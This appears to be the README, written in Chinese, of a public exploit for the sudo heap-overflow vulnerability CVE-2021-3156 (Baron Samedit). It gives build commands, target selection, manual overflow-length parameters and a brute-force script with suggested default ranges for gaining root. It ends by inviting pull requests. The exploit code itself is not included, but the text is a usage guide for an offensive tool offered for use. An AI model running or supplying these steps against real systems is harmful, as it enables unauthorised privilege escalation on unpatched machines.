这是针对 CVE-2021-3156 sudo 漏洞的漏洞利用代码(Qualys 称之为 Baron Samedit)。
构建:
$ make
列出目标:
$ ./sudo-hax-me-a-sandwich
运行:
$ ./sudo-hax-me-a-sandwich <target_number>
手动模式:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
确保你已安装 GNU parallel。
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
一些可尝试的默认值:
$ ./brute.sh 90 120 50 70 150 300
会吃满所有可用核心。别想着一边 Netflix 一边暴力搜索。
欢迎提交(合理的)PR,我可能会合并。
一些想法: